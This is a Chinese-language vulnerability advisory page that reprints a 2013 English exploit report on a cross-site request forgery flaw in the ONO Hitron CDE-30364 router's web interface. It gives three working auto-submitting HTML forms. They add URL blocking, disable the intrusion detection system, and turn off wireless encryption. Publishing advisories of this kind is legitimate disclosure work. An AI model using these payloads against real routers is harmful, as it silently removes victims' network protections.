发布日期:2013-09-27 更新日期:2013-10-01受影响系统: ono Hitron Technologies CDE-30364 3.1.0.8-ONO 描述: -------------------------------------------------------------------------------- Hitron CDE-30364 Router是通过Web管理界面设置和更改设备参数的ONO路由器。Hitron CDE-30364 Router 3.1.0.8版本,TCP/IP端口80上的Web界面存在CSRF漏洞,可导致更改路由器参数。该adsl路由器的默认IP地址是192.168.1.1。<*来源:Matias Mingorance Svensson *>测试方法: --------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!# Exploit Title: Router ONO Hitron CDE-30364 - CSRF Vulnerability # Date: 14-9-2013 # Exploit Author: Matias Mingorance Svensson - matias.ms[at]owasp.org # Vendor Homepage: http://www.ono.es/clientes/te-ayudamos/dudas/internet/equipos/hitron/hitron-cde-30364/ # Tested on: Hitron Technologies CDE-30364 # Version HW: 1A # Version SW: 3.1.0.8-ONO----------------------------------------------------------------------------------------- Introduction: ----------------------------------------------------------------------------------------- Hitron Technologies CDE-30364 is a famous ONO Router using, also, a web management interface in order to set and change device parameters.The Hitron Technologies CDE-30364"s web interface (listening on tcp/ip port 80) is prone to CSRF vulnerabilities which allows to change router parameters and to perform many modifications to the router"s parameters. The default ip adress of this adsl router, used for management purpose, is 192.168.1.1.----------------------------------------------------------------------------------------- Exploit-1: Enable/Disable Web Site Blocking and add new Key Word/URL blocking(google in this case) ----------------------------------------------------------------------------------------- <html> <body onload="javascript:document.forms[0].submit()"> <H2></H2> <form method="POST" name="form0" action=" http://192.168.1.1/goform/Keyword?file=parent-website&dir=admin %2F&checkboxName=on&blockingFlag=1&blockingAlertFlag=&cfKeyWord_Domain=&cfTrusted_MACAddress=&cfTrusted_MACAddress0= 0&cfTrusted_MACAddress1=0&cfTrusted_MACAddress2=0&cfTrusted_MACAddress3=0&cfTrusted_MACAddress4=0&cfTrusted_MACAddre ss5=0&trustedMAC=&keyword0=google"> </body> </html>----------------------------------------------------------------------------------------- Exploit-2: Enable/Disable Intrusion Detection System ----------------------------------------------------------------------------------------- <html> <body onload="javascript:document.forms[0].submit()"> <H2></H2> <form method="POST" name="form0" action=" http://192.168.1.1/goform/Firewall?dir=admin%2F&file=feat- firewall&ids_mode=0&IntrusionDMode=on&rspToPing=1"> </body> </html>----------------------------------------------------------------------------------------- Exploit-3: Disable(None) Wireless Security Mode ----------------------------------------------------------------------------------------- <html> <body onload="javascript:document.forms[0].submit()"> <H2></H2> <form method="POST" name="form0" action=" http://192.168.1.1/goform/Wls?dir=admin %2F&file=wireless_e&key1=0000000000&key2=0000000000&key3=0000000000&key4=0000000000&k128_1=0000000000000000000000000 0&k128_2=00000000000000000000000000&k128_3=00000000000000000000000000&k128_4=00000000000000000000000000&ssid_list=0& Encrypt_type=0"> </body> </html>----------------------------------------------------------------------------------------- Many other changes can be performed. -- Un saludo, Mat�as Mingorance Svensson *OWASP Foundation, Open Web Application Security Project* https://www.owasp.org http://es.linkedin.com/in/matiasms建议: -------------------------------------------------------------------------------- 厂商补丁:ono --- 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://www.ono.es/clientes/te-ayudamos/dudas/internet/equipos/hitron/hitron-cde-30364/Cisco IOS XR Software PPTP-ALG组件拒绝服务漏洞(CVE-2013-5498)Cisco Identity Services Engine MDM站点跨站脚本漏洞(CVE-2013-5504)相关资讯 Hitron CDE-30364 Router 本文评论 查看全部评论 (0)
易网时代-编程资源站